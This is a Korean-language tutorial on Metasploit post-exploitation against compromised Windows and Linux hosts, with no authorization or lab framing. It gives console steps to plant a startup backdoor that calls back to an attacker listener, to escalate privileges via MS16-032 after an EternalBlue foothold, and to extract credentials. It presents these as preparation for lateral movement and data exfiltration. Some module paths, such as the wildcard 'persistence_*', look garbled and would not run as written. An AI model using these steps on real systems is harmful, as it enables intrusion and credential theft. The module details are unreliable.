소개
사이버 보안 분야에서 해킹된 시스템에 대한 접근 권한을 유지하는 것은 필수적인 기술입니다. 이 튜토리얼에서는 Metasploit 의 강력한 포스트 - 익스플로잇 모듈을 활용하여 대상 시스템에서 지속적인 접근 권한을 확보하고 유지하는 방법을 안내합니다. 이 문서를 마치면 사이버 보안 기술을 효과적으로 활용하는 방법에 대한 포괄적인 이해를 얻게 될 것입니다.
Metasploit 포스트 - 익스플로잇 이해
Metasploit 포스트 - 익스플로잇이란 무엇인가?
Metasploit 포스트 - 익스플로잇은 손상된 시스템에 대한 접근 권한과 제어를 유지하는 데 사용되는 Metasploit 프레임워크 내의 도구 및 기술 집합을 의미합니다. 성공적인 익스플로잇을 통해 초기 발판을 마련한 후, 포스트 - 익스플로잇 단계에서는 공격자가 더 많은 정보를 수집하고 권한을 상승시키며 대상 시스템에 지속적으로 존재할 수 있도록 합니다.
포스트 - 익스플로잇의 주요 개념
- 정보 수집: 손상된 호스트에서 시스템 세부 정보, 사용자 계정, 네트워크 구성 및 기타 가치 있는 데이터를 수집합니다.
- 권한 상승: 표준 사용자에서 관리자 또는 루트 사용자와 같이 대상 시스템에서 더 높은 수준의 접근 권한과 허가를 얻습니다.
- 지속성: 초기 익스플로잇이 발견되고 완화된 후에도 공격자가 손상된 시스템에 대한 접근 권한을 유지할 수 있도록 합니다.
- 수평 이동: 초기 손상된 호스트에서 동일한 네트워크 내의 다른 시스템으로 공격자의 범위를 확장합니다.
Metasploit 포스트 - 익스플로잇 모듈
Metasploit 는 이러한 목표를 달성하기 위해 다양한 포스트 - 익스플로잇 모듈을 제공합니다. 일반적으로 사용되는 모듈 중 일부는 다음과 같습니다.
post/windows/gather/credentials/*: 손상된 Windows 시스템에서 다양한 유형의 자격 증명을 추출하는 모듈입니다.post/linux/gather/enum_users_history: 손상된 Linux 시스템에서 사용자 이력 정보를 수집합니다.post/multi/manage/shell_to_meterpreter: 쉘 세션을 더 강력한 Meterpreter 세션으로 업그레이드합니다.post/windows/manage/persistence_*: 손상된 Windows 시스템에서 지속적인 접근 권한을 설정하는 모듈입니다.
graph TD
A[초기 익스플로잇] --> B[포스트 - 익스플로잇]
B --> C[정보 수집]
B --> D[권한 상승]
B --> E[지속성]
B --> F[수평 이동]
Metasploit 모듈 활용하여 접근 권한 유지
지속적인 접근 권한 유지
손상된 시스템에 대한 지속적인 접근 권한을 유지하기 위해 Metasploit 는 안정적이고 장기적인 연결을 설정하는 데 사용할 수 있는 다양한 모듈을 제공합니다. 가장 일반적으로 사용되는 모듈 중 하나는 post/windows/manage/persistence_* 모듈로, 공격자가 시스템 시작 시 자동으로 실행되는 백도어를 생성할 수 있도록 합니다.
sequenceDiagram
participant 공격자
participant 대상 시스템
공격자->>대상 시스템: 초기 익스플로잇
대상 시스템->>공격자: 시스템 손상
공격자->>대상 시스템: 지속성 모듈 실행
대상 시스템->>공격자: 지속적인 접근 권한 설정
지속성 모듈 예시
- 공격자의 Ubuntu 22.04 시스템에서 Metasploit 콘솔을 실행합니다.
msfconsole - 지속성 모듈을 사용합니다.
use post/windows/manage/persistence_* LHOST(공격자의 IP 주소) 와LPORT(리스닝 포트) 와 같은 필요한 옵션을 설정합니다.set LHOST 192.168.1.100 set LPORT 4444- 모듈을 실행하여 대상 시스템에 지속적인 접근 권한을 설정합니다.
run
권한 상승
손상된 시스템에서 권한을 상승시키는 것은 추가적인 탐색 및 정보 수집을 위해 필수적입니다. Metasploit 는 post/windows/escalate/* 및 post/linux/escalate/*와 같은 다양한 모듈을 통해 권한 상승을 지원합니다.
권한 상승 예시 (Windows)
post/windows/escalate/ms16_032_secondary_logon_handle_privesc모듈을 사용합니다.use post/windows/escalate/ms16_032_secondary_logon_handle_privescSESSION번호와 같은 필요한 옵션을 설정합니다.set SESSION 1- 모듈을 실행하여 권한 상승을 시도합니다.
run
정보 수집
Metasploit 의 포스트 - 익스플로잇 모듈은 사용자 계정, 네트워크 구성 및 실행 중인 프로세스와 같은 손상된 시스템에 대한 중요한 정보를 수집하는 데 사용될 수 있습니다. 이 정보는 대상 시스템에 대한 공격자의 접근 및 제어를 더욱 확장하는 데 사용될 수 있습니다.
정보 수집 예시 (Linux)
post/linux/gather/enum_users_history모듈을 사용합니다.use post/linux/gather/enum_users_historySESSION번호와 같은 필요한 옵션을 설정합니다.set SESSION 1- 모듈을 실행하여 사용자 이력 정보를 수집합니다.
run
이러한 포스트 - 익스플로잇 모듈을 통해 수집된 정보는 측면 이동이나 데이터 유출과 같은 공격의 다음 단계를 계획하는 데 사용될 수 있습니다.
포스트 - 익스플로잇 기법의 실제 적용
시나리오: Windows 시스템 손상
이 시나리오에서는 손상된 Windows 시스템에 대한 포스트 - 익스플로잇 기법의 실제 적용을 보여줍니다.
초기 익스플로잇
exploit/windows/smb/ms17_010_eternalblue와 같은 Metasploit 익스플로잇을 사용하여 대상 시스템에 초기 발판을 마련합니다.- 손상된 시스템에서 쉘 또는 Meterpreter 세션을 확보합니다.
지속적인 접근 권한 유지
post/windows/manage/persistence_*모듈을 사용하여 대상 시스템에 지속적인 백도어를 생성합니다.- 시스템 시작 시 자동으로 페이로드를 실행하도록 지속성 모듈을 구성합니다.
- 대상 시스템을 재부팅하고 공격자가 여전히 연결할 수 있는지 확인하여 지속성 메커니즘을 검증합니다.
권한 상승
- 손상된 시스템의 현재 사용자 권한을 평가합니다.
post/windows/escalate/ms16_032_secondary_logon_handle_privesc모듈을 사용하여 권한 상승을 시도합니다.- 새로운 사용자 컨텍스트를 확인하여 권한 상승 성공 여부를 검증합니다.
정보 수집
post/windows/gather/credentials/*모듈을 사용하여 사용자 자격 증명과 같은 민감한 정보를 손상된 시스템에서 추출합니다.post/windows/gather/enum_logged_on_users및post/windows/gather/enum_processes와 같은 모듈을 사용하여 네트워크 구성 및 실행 중인 프로세스와 같은 추가 시스템 정보를 수집합니다.
graph TD
A[초기 익스플로잇] --> B[지속적인 접근 권한 유지]
B --> C[권한 상승]
C --> D[정보 수집]
D --> E[수평 이동]
E --> F[데이터 유출]
이러한 포스트 - 익스플로잇 기법을 적용함으로써 공격자는 접근 권한을 유지하고 권한을 상승시키며 손상된 Windows 시스템에서 가치 있는 정보를 수집하여 추가적인 수평 이동 및 데이터 유출을 위한 길을 열 수 있습니다.
요약
이 사이버 보안 튜토리얼에서는 손상된 시스템에서 접근 권한을 유지하기 위해 Metasploit 의 포스트 - 익스플로잇 모듈을 사용하는 방법에 대한 포괄적인 개요를 제공했습니다. 이러한 강력한 도구의 기능을 이해함으로써 사이버 보안 기술을 향상시키고 대상 시스템에 대한 접근 권한을 효과적으로 관리할 수 있습니다. 보안 전문가이든 꿈을 갖고 있는 해커이든, 이 문서에서 다룬 기술은 사이버 보안 지식을 새로운 차원으로 끌어올리는 데 도움이 될 것입니다.


